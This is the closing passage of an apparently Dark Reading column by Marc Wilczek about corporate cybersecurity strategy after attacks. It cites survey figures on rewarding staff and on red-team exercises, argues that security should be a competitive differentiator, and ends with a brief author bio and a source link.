Despite the survey’s bleak outlook, some organizations are evolving their security strategies to meet the current challenges. About 44% of them, worldwide, recognize or reward staffers who help ward off an IT security breach — and the number is even higher (74%) in the United States. Another 8% of companies perform red-team exercises to reveal weak spots in their IT and develop effective responses. But much more work needs to be done. Rather than viewing security simply as a cost, digital business champions will recognize it as a key aspect of every project and activity, use it to differentiate themselves from their less-secure competitors — and leave them in the dust.


Marc Wilczek is a columnist and recognized thought leader, geared toward helping organizations drive their digital agenda and achieve higher levels of innovation and productivity through technology. Over the past 20 years, he has held various senior leadership roles across …

Article source: https://www.darkreading.com/vulnerabilities---threats/despite-risks-nearly-half-of-it-execs-dont-rethink-cybersecurity-after-an-attack/a/d-id/1331627?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple